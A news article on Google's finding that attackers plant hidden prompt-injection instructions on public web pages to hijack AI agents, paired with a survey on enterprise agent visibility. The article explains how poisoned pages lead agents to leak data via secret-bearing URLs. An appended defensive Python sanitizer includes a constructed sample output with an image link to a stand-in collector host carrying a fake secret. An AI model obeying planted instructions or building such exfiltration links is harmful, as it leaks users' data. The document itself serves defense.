Google warns web pages poison agents
- Google said on April 23 that attackers are planting hidden instructions on public web pages to manipulate artificial intelligence agents that read them.
- Nokod said April 27 that security teams can see only 44% of business-built apps, agents, and automations, leaving most enterprise workflows outside review.
- Together, the findings show agent security is shifting from model safety to web exposure and asset visibility. (security.googleblog.com)
A prompt is an instruction for an artificial intelligence model. An indirect prompt injection hides that instruction inside a web page, email, or document an agent reads later. (support.google.com) (knowledge.workspace.google.com)

Google’s Threat Intelligence teams said April 23 that they found indirect prompt injection patterns on the public web after scanning Common Crawl, a repository with monthly snapshots of 2 billion to 3 billion pages. (security.googleblog.com)

The basic risk is simple: an agent opens a poisoned page, follows the hidden instruction instead of the user’s request, and can reveal internal data or take an unauthorized action. Google’s examples include a chatbot exposing sensitive information and a summarizer sending an email it was never supposed to send. (knowledge.workspace.google.com)

Google said the public web is an easy place for attackers to seed these instructions because agents increasingly browse websites as part of their work. The company described indirect prompt injection as a top-priority attack path for systems that can read content and act on a user’s behalf. (security.googleblog.com) (cloud.google.com)

The warning lands as enterprises are handing more work to business users, not just software teams. Nokod said April 27 that a survey of 200 chief information security officers found 80% of security teams lack full visibility into these assets, and most can track only 44% of the artificial intelligence tools handling sensitive company and user data. (prnewswire.com)

Nokod said business users now outnumber professional developers by an average of 4 to 1 in the organizations surveyed, and by as much as 10 to 1 in some companies. It named Microsoft Copilot Studio, ServiceNow, Power Automate, and UiPath as platforms driving that spread of business-built agents and automations. (prnewswire.com)

Google has been building defenses around the problem rather than claiming it is solved. Its published mitigations include prompt-injection classifiers, markdown sanitization, suspicious URL redaction, user-confirmation steps, and a system it calls URL provenance to block links generated at runtime for data theft. (knowledge.workspace.google.com) (bughunters.google.com)

Google’s Bug Hunters team described URL-based exfiltration as a common prompt-injection technique because a model can be tricked into building a link that carries a secret in its parameters. The team said defenders can break the attack chain by blocking the prompt, the secret, or the exfiltration path. (bughunters.google.com)

The thread running through both reports is that agent security now depends on two moving parts at once: what the agent reads from the open web and whether a company even knows the agent exists. Google is mapping the first problem in public data; Nokod is measuring the second inside the enterprise. (security.googleblog.com) (prnewswire.com)

That leaves a narrow operational question for companies adopting agents in 2026: which pages can an agent read, which tools can it call, and who approves the automations business users are already shipping. (security.googleblog.com) (prnewswire.com)
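As an added example (not Google's code, and not the system the reports describe), a simplified provenance check in Python that mirrors the idea behind URL provenance and markdown sanitization: a link in the agent's output is kept only if the same URL was already in the trusted context the agent was given, so a runtime-built link that smuggles a secret into its query parameters is redacted. Function names and all sample URLs are constructed for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Hypothetical, simplified provenance check (not Google's code): a URL in the agent's
# output survives only if the same URL appeared in the trusted context the agent was
# given; a known host carrying extra query parameters counts as a runtime-built link.
MD_LINK = re.compile(r'(!?)\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')
BARE_URL = re.compile(r'(?<!\]\()https?://[^\s<>)"]+')  # skips URLs inside [..](..)

def canonical(url):
    """Lowercase scheme/host, drop trailing slash, query as sorted (key, value) pairs."""
    p = urlsplit(url.strip())
    return (p.scheme.lower(), p.netloc.lower(), p.path.rstrip('/') or '/',
            tuple(sorted(parse_qsl(p.query, keep_blank_values=True))))

def sanitize(output, provenance):
    """Return (clean_text, redacted_urls) for one model response."""
    allowed = {canonical(u) for u in provenance}
    redacted = []

    def md_repl(m):
        bang, text, url = m.groups()
        if canonical(url) in allowed:
            return m.group(0)
        redacted.append(url)
        # Images load with no click, so drop them; links keep their text, lose the target.
        return "" if bang else text

    def bare_repl(m):
        url = m.group(0)
        if canonical(url) in allowed:
            return url
        redacted.append(url)
        return "[link removed]"

    clean = BARE_URL.sub(bare_repl, MD_LINK.sub(md_repl, output))
    return clean, redacted

# Constructed sample: URLs the agent was legitimately given, and a response in which a
# poisoned page has steered the model into emitting two runtime-built links.
TRUSTED_CONTEXT = ["https://intranet.example.com/wiki/onboarding",
                   "https://docs.example.com/api?v=2"]
POISONED_OUTPUT = (
    "Notes: [wiki](https://intranet.example.com/wiki/onboarding). "
    "![status](https://collector.example.net/p.png?d=sk-constructed-secret) "
    "API: [docs](https://docs.example.com/api?v=2&token=constructed-token) "
    "or https://docs.example.com/api?v=2 ."
)

def demo():
    """Run the sanitizer over the constructed sample."""
    return sanitize(POISONED_OUTPUT, TRUSTED_CONTEXT)
```

The redacted list is what you would log and alert on; a response that keeps producing unknown URLs is a sign the agent read something it should not have.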